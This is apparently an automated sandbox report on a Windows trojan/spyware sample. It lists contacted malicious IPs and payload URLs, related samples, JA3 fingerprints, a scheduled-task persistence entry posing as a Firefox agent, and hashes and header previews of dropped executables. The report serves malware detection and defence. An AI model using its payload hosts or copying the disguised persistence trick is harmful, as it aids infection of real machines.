                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id5ResponseDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id19DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpfalse
                                                                                                                                  high

                                                                                                                                  Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  45.9.20.240
                                                                                                                                  unknownRussian Federation
                                                                                                                                  35913DEDIPATH-LLCUStrue
                                                                                                                                  190.117.75.91
                                                                                                                                  unknownPeru
                                                                                                                                  12252AmericaMovilPeruSACPEfalse
                                                                                                                                  185.112.83.8
                                                                                                                                  unknownRussian Federation
                                                                                                                                  50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                  222.232.238.243
                                                                                                                                  unknownKorea Republic of
                                                                                                                                  9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                                                                                  50.62.140.96
                                                                                                                                  bastinscustomfab.comUnited States
                                                                                                                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                  211.59.14.90
                                                                                                                                  rcacademy.atKorea Republic of
                                                                                                                                  9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                                  148.0.74.229
                                                                                                                                  unknownDominican Republic
                                                                                                                                  6400CompaniaDominicanadeTelefonosSADOfalse
                                                                                                                                  86.107.197.138
                                                                                                                                  unknownRomania
                                                                                                                                  39855MOD-EUNLfalse
                                                                                                                                  218.38.155.210
                                                                                                                                  unknownKorea Republic of
                                                                                                                                  4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                  162.159.134.233
                                                                                                                                  cdn.discordapp.comUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                  Analysis ID:542025
                                                                                                                                  Start date:18.12.2021
                                                                                                                                  Start time:15:29:50
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 13m 27s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Sample file name:fw8ex1BNek.exe
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:24
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@8/9@50/10
                                                                                                                                  EGA Information:Failed
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 7.1% (good quality ratio 5.6%)
                                                                                                                                  • Quality average: 48.9%
                                                                                                                                  • Quality standard deviation: 34%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 84%
                                                                                                                                  • Number of executed functions: 376
                                                                                                                                  • Number of non-executed functions: 70
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Adjust boot time
                                                                                                                                  • Enable AMSI
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  Warnings:
                                                                                                                                  Show All
                                                                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.54.113.53
                                                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  15:31:42Task SchedulerRun new task: Firefox Default Browser Agent 4751B9F5DD431523 path: C:\Users\user\AppData\Roaming\acgvitw

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  45.9.20.240MMESEXN2zk.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240:7769/Igno.exe
                                                                                                                                  16c6a61f609b7ef5cd13fc587805018efad3be4254591.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240:7769/Igno.exe
                                                                                                                                  Ezd2mgg4EX.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240:7769/Igno.exe
                                                                                                                                  uFb6R9YkJT.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240:7769/Igno.exe
                                                                                                                                  190.117.75.914fKNxuVfcg.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  JlF5uYbq4K.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  MPpHg9aKGL.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  IoF1dw1p9z.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  EQ3sHtAgDs.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  Uw8rqOs7yq.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  e6fZIita6H.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  Mus8dgP0Np.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  5U6JcBLWiT.exeGet hashmaliciousBrowse
                                                                                                                                  • rcacademy.at/upload/
                                                                                                                                  DHeb66wiTb.exeGet hashmaliciousBrowse
                                                                                                                                  • srtuiyhuali.at/
                                                                                                                                  phuVfdLnVm.exeGet hashmaliciousBrowse
                                                                                                                                  • srtuiyhuali.at/
                                                                                                                                  U2fkDYwhFW.exeGet hashmaliciousBrowse
                                                                                                                                  • srtuiyhuali.at/
                                                                                                                                  2slaGlhJoL.exeGet hashmaliciousBrowse
                                                                                                                                  • gmpeople.com/upload/
                                                                                                                                  lXmNjnTcC0.exeGet hashmaliciousBrowse
                                                                                                                                  • membro.at/upload/
                                                                                                                                  Uywjiy9JbM.exeGet hashmaliciousBrowse
                                                                                                                                  • srtuiyhuali.at/
                                                                                                                                  jbXDPmGgoV.exeGet hashmaliciousBrowse
                                                                                                                                  • misha.at/upload/
                                                                                                                                  mvbkV6bX7D.exeGet hashmaliciousBrowse
                                                                                                                                  • misha.at/upload/
                                                                                                                                  Ysrk5KBSeP.exeGet hashmaliciousBrowse
                                                                                                                                  • misha.at/upload/
                                                                                                                                  76lblS4hXV.exeGet hashmaliciousBrowse
                                                                                                                                  • misha.at/upload/
                                                                                                                                  TzoD79oXwa.exeGet hashmaliciousBrowse
                                                                                                                                  • misha.at/upload/

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  cdn.discordapp.comzeTcRlSHFm.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.134.233
                                                                                                                                  QOfxgK3gFF.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.134.233
                                                                                                                                  TEiY7AHozk.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.133.233
                                                                                                                                  MMESEXN2zk.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.133.233
                                                                                                                                  vX8KRyF10y.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.133.233
                                                                                                                                  GtNkLD6ILs.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.135.233
                                                                                                                                  6O7qwT2jH6.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.135.233
                                                                                                                                  16c6a61f609b7ef5cd13fc587805018efad3be4254591.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.130.233
                                                                                                                                  XZ22CfAOCN.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.130.233
                                                                                                                                  eLc127EVdf.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.133.233
                                                                                                                                  dHyQ66BhVK.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.133.233
                                                                                                                                  rmmLc0TLEs.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.135.233
                                                                                                                                  WBGAO0xAUv.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.135.233
                                                                                                                                  r5XFZVA30A.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.134.233
                                                                                                                                  9syta0IvuY.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.130.233
                                                                                                                                  O2owPoPcA7.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.134.233
                                                                                                                                  sLlydJU3Ht.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.134.233
                                                                                                                                  ToFGMplxYQ.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.133.233
                                                                                                                                  BHx1bTu75D.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.133.233
                                                                                                                                  wklskIAumQ.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.134.233

                                                                                                                                  ASN

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  DEDIPATH-LLCUSTaOlUY6wjS.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  7JS6PAUofZ.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  Nx1AL6wrKL.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  I2sCETir7b.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  SO4ZVCHBfW.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  jSv4iQGz3c.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  pwmuRYUz7Q.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  ZpJ71IfPYf.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  MMESEXN2zk.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  mOZddovJo1.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  hWAIZ6XDbJ.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  AYK7rcrKp9.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  j3gyhG1rXk.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  03zOuHs4RK.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  16c6a61f609b7ef5cd13fc587805018efad3be4254591.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  73a53f8b8068543cf8d1219a2fdc671ed53d3602ae6c5.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  dSlGv27fS4.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  Ezd2mgg4EX.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  uFb6R9YkJT.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.240
                                                                                                                                  4k3hOJiIl2.exeGet hashmaliciousBrowse
                                                                                                                                  • 45.9.20.91
                                                                                                                                  AmericaMovilPeruSACPEDHL12.apkGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  4fKNxuVfcg.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  JlF5uYbq4K.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  ft4vhkD6o6Get hashmaliciousBrowse
                                                                                                                                  • 190.223.255.125
                                                                                                                                  n4QTkJbKITGet hashmaliciousBrowse
                                                                                                                                  • 190.117.109.90
                                                                                                                                  C8LXpA5LUrGet hashmaliciousBrowse
                                                                                                                                  • 190.117.209.254
                                                                                                                                  tUBeryQP6DGet hashmaliciousBrowse
                                                                                                                                  • 190.117.110.22
                                                                                                                                  sora.x86Get hashmaliciousBrowse
                                                                                                                                  • 190.116.77.70
                                                                                                                                  MPpHg9aKGL.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  6ItFV4CEi3Get hashmaliciousBrowse
                                                                                                                                  • 190.223.30.215
                                                                                                                                  IoF1dw1p9z.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  EQ3sHtAgDs.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  Uw8rqOs7yq.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  e6fZIita6H.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  8BIKTv5wXrGet hashmaliciousBrowse
                                                                                                                                  • 190.116.54.176
                                                                                                                                  LT3PftxFsPGet hashmaliciousBrowse
                                                                                                                                  • 190.117.110.33
                                                                                                                                  Mus8dgP0Np.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  5U6JcBLWiT.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  DHeb66wiTb.exeGet hashmaliciousBrowse
                                                                                                                                  • 190.117.75.91
                                                                                                                                  n6sOKP0EjJGet hashmaliciousBrowse
                                                                                                                                  • 190.223.29.39
                                                                                                                                  SUPERSERVERSDATACENTERRUzeTcRlSHFm.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  QOfxgK3gFF.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  TEiY7AHozk.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  vX8KRyF10y.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  GtNkLD6ILs.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  6O7qwT2jH6.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  16c6a61f609b7ef5cd13fc587805018efad3be4254591.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.112.83.8
                                                                                                                                  XZ22CfAOCN.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  eLc127EVdf.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  dHyQ66BhVK.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  rmmLc0TLEs.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  WBGAO0xAUv.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  r5XFZVA30A.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  9syta0IvuY.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  O2owPoPcA7.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  sLlydJU3Ht.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  ToFGMplxYQ.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  BHx1bTu75D.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  wklskIAumQ.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115
                                                                                                                                  B6WXcbIOpD.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.233.81.115

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  ce5f3254611a8c095a3d821d44539877zeTcRlSHFm.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  QOfxgK3gFF.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  TEiY7AHozk.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  MMESEXN2zk.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  vX8KRyF10y.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  GtNkLD6ILs.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  6O7qwT2jH6.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  imguser.dllGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  imguser.dllGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  encomendas010-5u44cr2luF.msiGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  16c6a61f609b7ef5cd13fc587805018efad3be4254591.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  XZ22CfAOCN.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  eLc127EVdf.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  WBGAO0xAUv.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  9syta0IvuY.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  O2owPoPcA7.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  sLlydJU3Ht.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  BHx1bTu75D.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  wklskIAumQ.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233
                                                                                                                                  Ezd2mgg4EX.exeGet hashmaliciousBrowse
                                                                                                                                  • 50.62.140.96
                                                                                                                                  • 162.159.134.233

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DB56.exe.log
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\DB56.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):700
                                                                                                                                  Entropy (8bit):5.346524082657112
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                  MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                  SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                  SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                  SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                  Malicious:true
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\4924.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):406045
                                                                                                                                  Entropy (8bit):6.683268409159715
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:kexzTwaVLQ5CcQXJsa6OyPE9SXVk1BQ4X+OZd7vniBqJWBxZL2:kexQaVIClsa6OyKSXVkXQ4X+cJ+qJW4
                                                                                                                                  MD5:4C2D293F6A8F5AB1D869EFDFCD4AD41A
                                                                                                                                  SHA1:ABC8EC37D505D17F6F2B7659B70C13629E16DA17
                                                                                                                                  SHA-256:2637F180814B50CF917008A1673D8139BB5156D3C535D86D52122DC6B07F6A99
                                                                                                                                  SHA-512:B2CBB407B3E8F22051D441748AB1E3F71F0F83D95F3CCFD5BA4829D6F66C903AEF551A6280735EACA6C7BD9149C1B58AEB8F7343A3DCA96AD32734D8F0C26587
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.IJ^..J^..J^....&.H^..%( .[^..%(..,^..C&-.O^..J^...^..%(..a^..%($.K^..%(#.K^..RichJ^..................PE..L...3.E_.....................^.......B............@..........................P.......F......................................d...<........k......................L...`...............................@...@............................................text.............................. ..`.data...............................@....rsrc....k.......l..................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\8CE5.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):94424
                                                                                                                                  Entropy (8bit):7.517598762367289
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:O/T2X/jN2vxZz0DTHUpouMJbL7xE+1nkhA1gq5iAYFh7z1N60m5fLsP/DsSTH:ObG7N2kDTHUpouMJbL7PaWRuNs0m5fLW
                                                                                                                                  MD5:EC1105BE312FD184FFC9D7F272D64B87
                                                                                                                                  SHA1:3C6B70AB854CC46448B55D8A057698C4568A85E2
                                                                                                                                  SHA-256:39CD27E2D57DB8BFEDFC31413679E5C4CB27274A45C0ACB98C0AD81905729CA5
                                                                                                                                  SHA-512:D3F1E91B9863E53E77F2936C79FBEB8FED5B12B4EF8C68F496DB86A3774295DD3F9DB7EA5493F2D026E76AF5922891379B2B8942EBA570A8D0F41A041FCD2182
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@................................../....@.............................................H............\..P............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...H...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\DB56.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):545280
                                                                                                                                  Entropy (8bit):5.831163111345628
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:5RZmeBqZRvZq9fRubqgJcL+okUesWafbPIInsTZrlTTPyDvu6t2Kekt6:5RZXQ50L7esWibIIn4ZrlTTPyDv8Kek
                                                                                                                                  MD5:F2F8A2B12CB2E41FFBE135B6ED9B5B7C
                                                                                                                                  SHA1:F7133A7435BE0377A45D6A0BD0EF56BB0198E9BE
                                                                                                                                  SHA-256:6D969631CE713FC809012F3AA8FD56CF9EF564CC1C43D5BA85F06FDDC749E4A1
                                                                                                                                  SHA-512:C3098730BE533954CAB86F8D29A40F77D551CCB6CB59FF72E9AB549277A93A257CC1A1501108C81E4C2D6D9723FE793780FFD810B9D839FAA6C64E33FE52C4BD
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 60%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.................0..J...........h... ........@.. ....................................@..................................h..K.................................................................................... ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@....reloc...............P..............@..B.................h......H...........4C.......... \..`............................................(....*..0..1.......8!....~....u....s....z&8.........8....(c...8....*.......................*.......*....(c...(....*...j*.......*.......*.......*.......*.......*....(....*.~(....(]...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....t.A.........t.A.......................*.......*.......
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Wamozart6.dat
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\8CE5.exe
                                                                                                                                  File Type:DOS executable (COM)
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):45227
                                                                                                                                  Entropy (8bit):7.703951928306707
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:ou2vw9rmpMyGOt9A9uSlkRdw1flpf5IXUx3zXn+AznL+oFw1Og:ouj9SpMC1S2dslI23zXlzLtzg
                                                                                                                                  MD5:B9D4D051E48D4E9AD194CEF9D1599C0E
                                                                                                                                  SHA1:251207FDE809001616B9982CF142884848A51718
                                                                                                                                  SHA-256:5192A1C63E6BAC303A0766749559BBB25B7B3D442888D162976A0927F9E3F16C
                                                                                                                                  SHA-512:17F96B7626C743C1D7598DF82CA11A41B7AFD91E3486A1AC687DFD460A7C77BE9088FFBBF8DCE666C197F70E7BF28109DC3AE8AF37C5A346AE4DA9FD91F6AEA7
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Reputation:unknown
